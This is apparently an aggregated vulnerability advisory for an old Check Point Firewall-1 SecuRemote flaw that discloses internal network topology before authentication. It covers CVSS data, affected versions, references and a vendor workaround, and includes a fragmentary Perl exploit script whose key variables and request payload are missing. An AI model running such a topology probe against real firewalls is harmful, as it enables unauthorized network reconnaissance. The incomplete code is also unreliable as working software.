Published: 2001-07-18 00:00:00
Revised: 2008-09-10 15:10:13

[Original] The default configuration of SecuRemote for Check Point Firewall-1 allows remote attackers to obtain sensitive configuration information for the protected network without authentication.

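[CNNVD] Check Point Firewall-1 SecureRemote Network Information Disclosure Vulnerability (CNNVD-200107-113)

        SecureRemote is a proprietary VPN component designed by Check Point Software and included in some versions of Firewall-1.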

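- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]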

- CPE (Affected Platforms and Products)

cpe:/a:checkpoint:firewall-1:4.1:sp1    Checkpoint Firewall-1 1 4.1 SP1
cpe:/a:checkpoint:firewall-1:4.0    Checkpoint Firewall-1 4.0
cpe:/a:checkpoint:firewall-1:4.1    Checkpoint Firewall-1 4.1
cpe:/a:checkpoint:firewall-1:4.1:sp2    Checkpoint Firewall-1 1 4.1 SP2
cpe:/a:checkpoint:firewall-1:4.1:sp4    Checkpoint Firewall-1 1 4.1 SP4
cpe:/a:checkpoint:firewall-1:4.1:sp3    Checkpoint Firewall-1 1 4.1 SP3

- OVAL (Technical Details for Detection)


- Official Database Links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other Links and Resources
(VENDOR_ADVISORY)  XF  fw1-securemote-gain-information(6857)
(UNKNOWN)  BID  3058
(UNKNOWN)  BUGTRAQ  20010718 Firewall-1 Information leak

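- Vulnerability Information

Check Point Firewall-1 SecureRemote Network Information Disclosure Vulnerability
Medium risk    Configuration error
2001-07-18 00:00:00 2005-05-02 00:00:00
        SecureRemote is a proprietary VPN component designed by Check Point Software and included in some versions of Firewall-1.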

- Advisories and Patches

        * Using the Policy Editor, disable the "respond to unauthenticated topology requests" option.
        Check Point Software

- Vulnerability Information (21015)

Check Point Firewall-1 4 SecureRemote Network Information Leak Vulnerability (EDBID:21015)
hardware remote
2001-07-17 Verified
0 Haroon Meer & Roelof Temmingh
N/A

SecureRemote is the proprietary VPN infrastructure designed by Check Point Software, and included with some versions of Firewall-1.

A problem with the package allows remote users to gain information about internal networks. Older versions of the package send network topology information to SecureRemote connections prior to authentication, allowing an information gathering attack. 

# A Command-line tool that can be used to download network Topology
# from Firewall-1's running SecureRemote, with the option "Allow un
# authenticated cleartext topology downloads".
# Usage IP
# Haroon Meer & Roelof Temmingh 2001/07/17
# -

use Socket;
if ($#ARGV<0) {die "Usage: IP\n";}

print "Testing $host on port $port\n";

$SENDY = pack("H*",$SENDY);


if ($#results == 0) {
 print "No results on port 256 - trying 264\n";
 if ($#results2 == 0) {die "Sorry - no results\n";}
} else {print @results;}

sub sendraw {
 my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,$port,$target)){
  my @in;
  select(S);      $|=1;   print $pstr;
  while(<S>){ push @in, $_;}
  select(STDOUT); close(S); return @in;
 } else { return ""; }
}
# Spidermark: sensepostdata fw1

- Vulnerability Information

Check Point FireWall-1 SecuRemote Internal Network Information Remote Disclosure
Remote / Network Access Information Disclosure
Loss of Confidentiality
Exploit Public

- Vulnerability Description

Check Point FireWall-1 contains a flaw that may disclose sensitive network topology information to a remote attacker. The issue is due to a flaw in the SecuRemote software which creates sessions between remote users and FW-1 modules. When a remote user connects to the system, a network topology is transferred to the client, regardless of authentication.

- Timeline

2001-07-21 Unknown
2001-07-21 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround:
1. Set up the firewall gateway for VPN with "Respond to unauthenticated topology requests" enabled.
2. Set up a sample SecuRemote client, and download the site topology.
3. Turn off "Respond to unauthenticated topology requests".
4. Securely distribute the file userc.C from the sample client to all SecuRemote users.
You will need to send out an updated userc.C any time there is a change to the encryption domain or keying info.

- Related References

- Vulnerability Author